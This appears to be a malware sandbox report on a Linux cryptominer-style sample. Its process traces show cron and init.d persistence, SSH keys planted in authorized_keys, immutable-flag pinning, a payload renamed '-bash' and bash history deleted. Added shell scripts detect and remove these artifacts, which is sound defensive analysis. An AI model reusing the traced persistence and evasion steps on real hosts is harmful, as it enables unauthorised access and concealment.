/bin/chmod

[chmod +x /sbin/lntpdate]

/usr/bin/chattr

[chattr +i +a /sbin/lntpdate /sbin/bsysdl]

/usr/bin/which

[which update-rc.d]

/usr/bin/chattr

[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]

/bin/rm

[rm -rf /sbin/binitd]

/bin/cp

[cp -f -r -- /tmp/.systemd/.armv7l /sbin/binitd]

/usr/bin/tee

[tee -a /etc/init.d/ntpdate]

/bin/chmod

[chmod +x /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/chattr

[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/which

[which chkconfig]
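
The two cron persistence mechanisms in this report land in different places. /tmp/.systemd/auto (behavioral10 above) checks `crontab -l | grep .systemd | wc -l`, installs a user crontab with `crontab systemd.d` and deletes the source file, so the artifact is a spool file under /var/spool/cron/crontabs. /tmp/.systemd/ntpdate (this analysis, and again on x86_64 in behavioral19) copies the architecture-specific payload to /sbin/bcrond, /sbin/bsysde, /sbin/bsysdl and /sbin/binitd, writes ntpdate wrappers into every /etc/cron.* directory, /etc/init.d and /sbin/entpdate and /sbin/lntpdate, probes for systemctl, update-rc.d and chkconfig, and pins each file with chattr +i +a. The audit script below is an added example, not sandbox output and not the sample's code: it checks a live host, or a constructed tree for offline use, for both sets of artifacts. The ELF-versus-text classification, the fake tree contents and the crontab line it plants are assumptions for the demonstration; the real contents of the dropped files are not reproduced on this page.

```shell
#!/bin/sh
# Added audit example (not from the sandbox report or the sample).
# ROOT prefixes every path so the functions can run against a constructed tree.

# Paths written by /tmp/.systemd/ntpdate in the process listing above.
NTPDATE_DROPS="etc/cron.d/ntpdate etc/cron.daily/ntpdate etc/cron.hourly/ntpdate \
etc/cron.monthly/ntpdate etc/cron.weekly/ntpdate etc/init.d/ntpdate \
sbin/entpdate sbin/lntpdate sbin/bcrond sbin/bsysde sbin/bsysdl sbin/binitd"

# Classify a file by its first four bytes: the cp'd payload copies are ELF
# binaries, the tee-written wrappers are text.
file_kind() {
    if [ "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]; then
        echo elf
    else
        echo text
    fi
}

# Attribute flags from lsattr (the sample sets +i +a). Prints '?' when lsattr
# is missing or the filesystem has no attribute support, e.g. tmpfs.
attr_flags() {
    flags=$(lsattr -d "$1" 2>/dev/null | awk 'NR == 1 {print $1}')
    if [ -n "$flags" ]; then echo "$flags"; else echo '?'; fi
}

# One line per dropped file present under ROOT: path, kind, attribute flags.
audit_ntpdate_drops() {
    root=${1:-}
    for rel in $NTPDATE_DROPS; do
        p="$root/$rel"
        [ -f "$p" ] || continue
        printf '%s %s %s\n' "$p" "$(file_kind "$p")" "$(attr_flags "$p")"
    done
    return 0
}

# Crontab spool entries pointing at a hidden directory under /tmp or at
# .systemd, the string /tmp/.systemd/auto itself greps crontab -l for.
audit_cron_spool() {
    root=${1:-}
    for f in "$root"/var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        grep -nE '/tmp/\.|\.systemd' "$f" | sed "s|^|$f:|"
    done
    return 0
}

# Constructed tree mirroring the trace, for offline demonstration only. The
# wrapper text and the crontab line are placeholders, not the real contents.
make_fake_root() {
    root=$(mktemp -d)
    for rel in $NTPDATE_DROPS; do
        mkdir -p "$root/$(dirname "$rel")"
        case "$rel" in
            sbin/b*) printf '\177ELF' > "$root/$rel" ;;                 # stands in for the copied payload
            *)       printf '#!/bin/sh\n# placeholder\n' > "$root/$rel" ;;
        esac
    done
    mkdir -p "$root/var/spool/cron/crontabs"
    printf '* * * * * /tmp/.systemd/.systemd\n' > "$root/var/spool/cron/crontabs/root"
    echo "$root"
}

demo_root=$(make_fake_root)
audit_ntpdate_drops "$demo_root"
audit_cron_spool "$demo_root"
rm -rf "$demo_root"
```

Run audit_ntpdate_drops and audit_cron_spool with no argument to check the live host. Because the sample sets both the immutable and the append-only flag, rm and truncation fail with "Operation not permitted" until chattr -i -a has been applied to each path, which is exactly what the sample does itself before reinstalling. The files were written with cp and tee, so no package owns them; on Debian-family hosts `dpkg -S` on any of these paths reporting no owning package confirms that, whatever the name suggests, they did not come from the distribution's ntpdate package.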

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/etc/cron.d/ntpdate

MD5 755700d11d59e0daeb4f6452aee1ad5d
SHA1 6b1194921376bef9c7559629712772a11e78eaa4
SHA256 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00
SHA512 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7

/sbin/entpdate

MD5 4aeb6335d69473274691f59dc2096cfe
SHA1 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc
SHA256 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785
SHA512 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c

/sbin/lntpdate

MD5 3748e897538baafbc7b260b4d2fbc98f
SHA1 41d179e3cfc4c1820ea2c0fed0d50009564db79b
SHA256 ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7
SHA512 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea

/etc/init.d/ntpdate

MD5 bd99a962d94b5b4c32f8b7c8ca1f9ea9
SHA1 af33dc04d1f16e5ccceb2c0569b26e45bb65b32b
SHA256 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28
SHA512 fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsbe-20240729-en

Max time kernel

0s

Command Line

[/tmp/.update/.run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/update.dir /tmp/.update/.run N/A
File opened for modification /tmp/.update/.update /tmp/.update/.run N/A

Processes

/tmp/.update/.run

[/tmp/.update/.run]

/bin/uname

[uname -m]

/bin/cat

[cat update.dir]

/tmp/.update/.mips

[./.mips -f]

Network

N/A

Files

/tmp/.update/update.dir

MD5 f162d09e078b8201089b7e20ea72f2bf
SHA1 f7da8700cd21e201f62a17992d2ac15c09c447a1
SHA256 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb
SHA512 adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb

/tmp/.update/.update

MD5 a0669fc7ed6e6c80a991b070e1f7909a
SHA1 313f4f3deaf4237a8d0059593f1a68d7b7cc434f
SHA256 808530d3d871a0ae2d88b92e3820c8dbdd9b9a1ab469d4ed0088dce65b96545b
SHA512 2963bbba5c52178b3732139352144c8b34a81561ada3b803f50fdd51401017dc762fbdaed483e24da56b59d04381c8122b912c31d624a13d19ddfe951a55ec1f

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsel-20240729-en

Max time kernel

2s

Command Line

[/tmp/.update/auth]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /tmp/.update/auth N/A
File opened for modification /home/user/.ssh/authorized_keys /tmp/.update/auth N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/authusers /tmp/.update/auth N/A

Processes

/tmp/.update/auth

[/tmp/.update/auth]

/bin/uname

[uname -n]

/bin/mkdir

[mkdir /root/.ssh]

/bin/chmod

[chmod 0700 /root/.ssh]

/bin/chmod

[chmod 0644 /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ai /root/.ssh /root/.ssh/authorized_keys]

/bin/rm

[rm -rf authusers]

/bin/grep

[grep -e /bin/sh -e /bin/bash]

/bin/cat

[cat /etc/passwd]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/usr/bin/chattr

[chattr -ai /root/.ssh /root/.ssh/authorized_keys]

/bin/sed

[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]

/usr/bin/cut

[cut -d : -f 1]

/usr/bin/cut

[cut -d : -f 6]

/bin/mkdir

[mkdir /home/user/.ssh]

/bin/chown

[chown -R user /home/user/.ssh]
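
The auth stage enumerates every account whose passwd line mentions /bin/sh or /bin/bash, takes the user name and home directory from fields 1 and 6, creates ~/.ssh and writes authorized_keys; for root it pins both the directory and the file with chattr +ai, and before rewriting it deletes any line matching r78x7ECphuPrGrR4SDqE1w, the only key-specific string visible in the trace. The script below is an added example, not the sample's code and not sandbox output: it walks the same user set, reports authorized_keys files that contain that fragment, and strips the matching lines. The passwd entries and key lines it constructs are placeholders; the planted key itself is not reproduced on this page.

```shell
#!/bin/sh
# Added example (not from the sandbox report or the sample): audit and clean
# authorized_keys for the key fragment the auth stage manages.

# The only key-specific string in the trace: the pattern of the sample's
# "sed -i /.../d /root/.ssh/authorized_keys" call.
KEY_MARKER='r78x7ECphuPrGrR4SDqE1w'

# "user home" for each account whose shell field mentions /bin/sh or /bin/bash,
# approximating the sample's grep -e /bin/sh -e /bin/bash over /etc/passwd
# followed by cut -d : -f 1 and cut -d : -f 6.
shell_users() {
    awk -F: 'index($7, "/bin/sh") || index($7, "/bin/bash") {print $1, $6}' "${1:-/etc/passwd}"
}

# "user path" for every shell user whose authorized_keys contains KEY_MARKER.
# ROOT prefixes all paths so the check can run against a constructed tree.
find_planted_keys() {
    root=${1:-}
    shell_users "$root/etc/passwd" | while read -r user home; do
        ak="$root$home/.ssh/authorized_keys"
        [ -f "$ak" ] || continue
        if grep -q -- "$KEY_MARKER" "$ak"; then
            printf '%s %s\n' "$user" "$ak"
        fi
    done
    return 0
}

# Drop every line carrying KEY_MARKER from one authorized_keys file and print
# how many lines were removed. Writing through cat keeps inode, owner and
# mode; it fails while the sample's chattr +ai is still in effect.
remove_planted_key() {
    ak=$1
    before=$(wc -l < "$ak" | tr -d ' ')
    tmp="$ak.clean.$$"
    grep -v -- "$KEY_MARKER" "$ak" > "$tmp" || true   # grep -v exits 1 if nothing is left
    if ! cat "$tmp" > "$ak" 2>/dev/null; then
        echo "cannot write $ak; clear the immutable flag first (chattr -ai)" >&2
        rm -f "$tmp"; echo 0; return 0
    fi
    rm -f "$tmp"
    after=$(wc -l < "$ak" | tr -d ' ')
    echo $((before - after))
}

# Constructed tree for offline demonstration: two shell users, one service
# account, placeholder keys (the real planted key is not on this page).
make_fake_root() {
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/root/.ssh" "$root/home/user/.ssh" "$root/home/svc"
    cat > "$root/etc/passwd" <<EOF
root:x:0:0:root:/root:/bin/bash
user:x:1000:1000:user:/home/user:/bin/sh
svc:x:999:999::/home/svc:/usr/sbin/nologin
EOF
    printf 'ssh-ed25519 AAAAC3placeholder admin@example\n' > "$root/root/.ssh/authorized_keys"
    printf 'ssh-rsa AAAAB3placeholder %s\n' "$KEY_MARKER" >> "$root/root/.ssh/authorized_keys"
    printf 'ssh-rsa AAAAB3placeholder %s\n' "$KEY_MARKER" > "$root/home/user/.ssh/authorized_keys"
    echo "$root"
}

demo_root=$(make_fake_root)
find_planted_keys "$demo_root"
for ak in $(find_planted_keys "$demo_root" | awk '{print $2}'); do
    echo "$ak: removed $(remove_planted_key "$ak") line(s)"
done
rm -rf "$demo_root"
```

Run find_planted_keys without an argument against the live host. If remove_planted_key reports that the file cannot be written, the flags the sample set are still in place: clear them with chattr -ai on both /root/.ssh and /root/.ssh/authorized_keys, as the sample does before its own sed, then re-run. For non-root accounts the sample also runs chown -R user on ~/.ssh, so ownership looks normal and only the key content gives it away.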

Network

N/A

Files

/root/.ssh/authorized_keys

MD5 5c32d0c2275c7ce0965aafd240461f13
SHA1 17eb3e899cf234ee1a8ddc07e8979d72a0d92a0c
SHA256 d7517566205c297d1efd7a9e81a57fc53f39e6ce2e42f0044933238d37da36ce
SHA512 3c0aa1096dd8f538616a43b1a32b8b97322608d53ed35f7dea500f799a29b3eccaeecfe0b1358cf118ad3c0f1d74f23ca7650ad8174a5cad1751e1667bd6d13c

/tmp/.update/authusers

MD5 9514cd886e4faf1f23baadfd967abcbd
SHA1 00894ed21cee494a192e94a782ae265e45d828f1
SHA256 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432
SHA512 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6

/tmp/.update/authusers

MD5 fe065880cc6e0333e8679d0e03ff2369
SHA1 aaceb9f893c93f47ddccca1e2e502c01ecbc5456
SHA256 f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77
SHA512 ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-armhf-20240611-en

Max time kernel

2s

Command Line

[/tmp/.systemd/.run]

Signatures

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/13/stat /bin/ps N/A
File opened for reading /proc/28/cmdline /bin/ps N/A
File opened for reading /proc/29/status /bin/ps N/A
File opened for reading /proc/281/cmdline /bin/ps N/A
File opened for reading /proc/295/cmdline /bin/ps N/A
File opened for reading /proc/661/stat /bin/ps N/A
File opened for reading /proc/683/stat /bin/ps N/A
File opened for reading /proc/28/stat /bin/ps N/A
File opened for reading /proc/606/status /bin/ps N/A
File opened for reading /proc/3/cmdline /bin/ps N/A
File opened for reading /proc/342/status /bin/ps N/A
File opened for reading /proc/598/cmdline /bin/ps N/A
File opened for reading /proc/683/cmdline /bin/ps N/A
File opened for reading /proc/14/cmdline /bin/ps N/A
File opened for reading /proc/144/cmdline /bin/ps N/A
File opened for reading /proc/679/cmdline /bin/ps N/A
File opened for reading /proc/26/status /bin/ps N/A
File opened for reading /proc/29/cmdline /bin/ps N/A
File opened for reading /proc/22/status /bin/ps N/A
File opened for reading /proc/314/stat /bin/ps N/A
File opened for reading /proc/328/stat /bin/ps N/A
File opened for reading /proc/606/status /bin/ps N/A
File opened for reading /proc/691/stat /bin/ps N/A
File opened for reading /proc/12/status /bin/ps N/A
File opened for reading /proc/155/stat /bin/ps N/A
File opened for reading /proc/279/stat /bin/ps N/A
File opened for reading /proc/283/stat /bin/ps N/A
File opened for reading /proc/694/status /bin/ps N/A
File opened for reading /proc/686/cmdline /bin/ps N/A
File opened for reading /proc/686/cmdline /bin/ps N/A
File opened for reading /proc/706/cmdline /bin/ps N/A
File opened for reading /proc/41/stat /bin/ps N/A
File opened for reading /proc/sys/kernel/osrelease /bin/ps N/A
File opened for reading /proc/283/stat /bin/ps N/A
File opened for reading /proc/81/status /bin/ps N/A
File opened for reading /proc/342/cmdline /bin/ps N/A
File opened for reading /proc/685/cmdline /bin/ps N/A
File opened for reading /proc/self/stat /bin/ps N/A
File opened for reading /proc/316/cmdline /bin/ps N/A
File opened for reading /proc/1/status /bin/ps N/A
File opened for reading /proc/281/status /bin/ps N/A
File opened for reading /proc/155/cmdline /bin/ps N/A
File opened for reading /proc/601/status /bin/ps N/A
File opened for reading /proc/113/stat /bin/ps N/A
File opened for reading /proc/693/cmdline /bin/ps N/A
File opened for reading /proc/43/cmdline /bin/ps N/A
File opened for reading /proc/279/status /bin/ps N/A
File opened for reading /proc/8/stat /bin/ps N/A
File opened for reading /proc/143/stat /bin/ps N/A
File opened for reading /proc/103/stat /bin/ps N/A
File opened for reading /proc/598/cmdline /bin/ps N/A
File opened for reading /proc/229/cmdline /bin/ps N/A
File opened for reading /proc/280/stat /bin/ps N/A
File opened for reading /proc/598/status /bin/ps N/A
File opened for reading /proc/686/cmdline /bin/ps N/A
File opened for reading /proc/2/cmdline /bin/ps N/A
File opened for reading /proc/29/stat /bin/ps N/A
File opened for reading /proc/603/cmdline /bin/ps N/A
File opened for reading /proc/655/cmdline /bin/ps N/A
File opened for reading /proc/679/status /bin/ps N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/24/stat /bin/ps N/A
File opened for reading /proc/26/cmdline /bin/ps N/A
File opened for reading /proc/21/stat /bin/ps N/A

Processes

/tmp/.systemd/.run

[/tmp/.systemd/.run]

/bin/grep

[grep -v R]

/bin/ps

[ps x]

/bin/grep

[grep ssh ]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/ps

[ps x]

/bin/grep

[grep ssh$]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep sh$]

/bin/ps

[ps x]

/bin/grep

[grep -v R]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $1}]

/bin/uname

[uname -m]

/bin/cp

[cp -f -- .armv7l -bash]

/tmp/.systemd/-bash

[./-bash]
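
Before launching anything, .run inspects the process list three times with `ps x | grep ... | grep -v R | grep -v grep | awk '{print $1}'`, selecting ssh, ssh$ and sh$ processes that are not in the running state, then copies the architecture-specific payload (.armv7l here) to a file named -bash and executes it, so the miner shows up in ps under a login shell's name. The script below is an added example, not code from the sample or the sandbox: it flags processes whose argv[0] is a shell name but whose /proc/PID/exe does not resolve to a real shell binary, and separately any process executing from /tmp, /var/tmp or /dev/shm. The constructed /proc tree and the list of legitimate shell paths are assumptions.

```shell
#!/bin/sh
# Added example (not from the sandbox report or the sample): spot a payload
# running under a shell's name, the way .run executes .armv7l as ./-bash.
# PROC is a parameter so the check can run against a constructed tree.

# Executables a "-bash"/"-sh" argv[0] may legitimately resolve to. Assumption:
# extend for your distribution (merged /usr, zsh login shells, ...).
REAL_SHELLS='/bin/bash /usr/bin/bash /bin/sh /usr/bin/sh /bin/dash /usr/bin/dash'

# argv[0] of a process directory, from the NUL-separated cmdline file.
argv0() {
    tr '\000' '\n' < "$1/cmdline" | head -n 1
}

# "PID argv0 exe" for processes that present a shell name (with or without the
# login-shell dash) but whose exe link does not point at a real shell.
find_shell_masquerade() {
    proc=${1:-/proc}
    for d in "$proc"/[0-9]*; do
        [ -r "$d/cmdline" ] || continue
        a0=$(argv0 "$d")
        case "$a0" in
            -bash|bash|-sh|sh|-dash|dash) ;;
            *) continue ;;
        esac
        exe=$(readlink "$d/exe" 2>/dev/null || echo '?')
        ok=0
        for s in $REAL_SHELLS; do
            if [ "$exe" = "$s" ]; then ok=1; fi
        done
        [ "$ok" -eq 1 ] || printf '%s %s %s\n' "$(basename "$d")" "$a0" "$exe"
    done
    return 0
}

# "PID exe" for processes executing from a world-writable staging directory;
# every payload in this report is launched from /tmp/.systemd or /tmp/.update.
find_tmp_executables() {
    proc=${1:-/proc}
    for d in "$proc"/[0-9]*; do
        exe=$(readlink "$d/exe" 2>/dev/null) || continue
        case "$exe" in
            /tmp/*|/var/tmp/*|/dev/shm/*) printf '%s %s\n' "$(basename "$d")" "$exe" ;;
        esac
    done
    return 0
}

# Build one fake /proc/PID entry: cmdline (NUL-separated argv) and the exe link.
add_proc_entry() {
    pdir="$1/$2"; exe_target=$3; shift 3
    mkdir -p "$pdir"
    : > "$pdir/cmdline"
    for a in "$@"; do printf '%s\000' "$a" >> "$pdir/cmdline"; done
    ln -s "$exe_target" "$pdir/exe"
}

# Constructed process table for offline demonstration; PIDs are arbitrary.
make_fake_proc() {
    proc=$(mktemp -d)
    add_proc_entry "$proc" 1001 /bin/bash '-bash'               # genuine login shell
    add_proc_entry "$proc" 1002 /tmp/.systemd/-bash '-bash'     # the copied payload from the trace
    add_proc_entry "$proc" 1003 /usr/sbin/sshd 'sshd: user [priv]'
    add_proc_entry "$proc" 1004 /tmp/.update/.mips ./.mips -f   # behavioral26's ./.mips -f
    echo "$proc"
}

demo_proc=$(make_fake_proc)
find_shell_masquerade "$demo_proc"
find_tmp_executables "$demo_proc"
rm -rf "$demo_proc"
```

On a live host run both functions without arguments as root, since /proc/PID/exe of other users' processes is not readable otherwise. The exe link is the reliable field here: ps, top and /proc/PID/comm all take their name from what the sample chose to call itself, which is exactly why it renamed the payload.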

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/.systemd/clean]

Signatures

N/A

Processes

/tmp/.systemd/clean

[/tmp/.systemd/clean]

/bin/uname

[uname -m]

/bin/rm

[rm -rf .i686]

/bin/rm

[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]

/bin/rm

[rm -rf /root/.bash_history]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.systemd/go]

Signatures

N/A

Processes

/tmp/.systemd/go

[/tmp/.systemd/go]

/tmp/.systemd/auto

[./auto]

/tmp/.systemd/ntpdate

[./ntpdate]

/tmp/.systemd/.run

[./.run]

/tmp/.systemd/clean

[./clean]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
N/A 224.0.0.251:5353 udp
GB 89.187.167.38:443 tcp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsel-20240418-en

Max time kernel

0s

Command Line

[/tmp/.systemd/go]

Signatures

N/A

Processes

/tmp/.systemd/go

[/tmp/.systemd/go]

/tmp/.systemd/auto

[./auto]

/tmp/.systemd/ntpdate

[./ntpdate]

/tmp/.systemd/.run

[./.run]

/tmp/.systemd/clean

[./clean]

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/.systemd/ntpdate]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/cron.d/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.daily/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.hourly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.monthly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.weekly/ntpdate /usr/bin/tee N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/ntpdate /usr/bin/tee N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/bsysde /bin/cp N/A
File opened for modification /sbin/entpdate /usr/bin/tee N/A
File opened for modification /sbin/bsysdl /bin/cp N/A
File opened for modification /sbin/lntpdate /usr/bin/tee N/A
File opened for modification /sbin/binitd /bin/cp N/A
File opened for modification /sbin/bcrond /bin/cp N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/ntpdate N/A

Processes

/tmp/.systemd/ntpdate

[/tmp/.systemd/ntpdate]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/bin/mkdir

[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]

/usr/bin/chattr

[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]

/bin/rm

[rm -rf /sbin/bcrond]

/bin/cp

[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bcrond]

/usr/bin/tee

[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]

/bin/chmod

[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr -a -i /sbin/bsysd]

/bin/rm

[rm -rf /sbin/bsysd]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/entpdate /sbin/bsysde]

/bin/rm

[rm -rf /sbin/bsysde]

/bin/cp

[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bsysde]

/usr/bin/tee

[tee -a /sbin/entpdate]

/bin/chmod

[chmod +x /sbin/entpdate]

/usr/bin/chattr

[chattr +i +a /sbin/entpdate /sbin/bsysde]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/lntpdate /sbin/bsysdl]

/bin/rm

[rm -rf /sbin/bsysdl]

/bin/cp

[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bsysdl]

/usr/bin/tee

[tee -a /sbin/lntpdate]

/bin/chmod

[chmod +x /sbin/lntpdate]

/usr/bin/chattr

[chattr +i +a /sbin/lntpdate /sbin/bsysdl]

/usr/bin/which

[which update-rc.d]

/usr/bin/chattr

[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]

/bin/rm

[rm -rf /sbin/binitd]

/bin/cp

[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/binitd]

/usr/bin/tee

[tee -a /etc/init.d/ntpdate]

/bin/chmod

[chmod +x /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/chattr

[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/which

[which chkconfig]

Network

Country Destination Domain Proto
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
N/A 224.0.0.251:5353 udp
GB 89.187.167.3:443 tcp

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/sbin/bcrond

MD5 92dc30d449f563a5bdbba08d4a9d57fc
SHA1 ff609eed2df786396203a8806400566df079cc7f
SHA256 86db0330a233efe6e11f944833f9e9b7472d7f34595cf693f001d99df641513b
SHA512 573fa375ddcb6a49690f5168d791af2529a89233d3bf0ff50c2b88686c27e4cef59432e0f6ae71745fecfa2657c23248ad33ea50ac8b9f1c96721f38e3325097

/etc/cron.d/ntpdate

MD5 755700d11d59e0daeb4f6452aee1ad5d
SHA1 6b1194921376bef9c7559629712772a11e78eaa4
SHA256 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00
SHA512 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7

/sbin/entpdate

MD5 4aeb6335d69473274691f59dc2096cfe
SHA1 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc
SHA256 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785
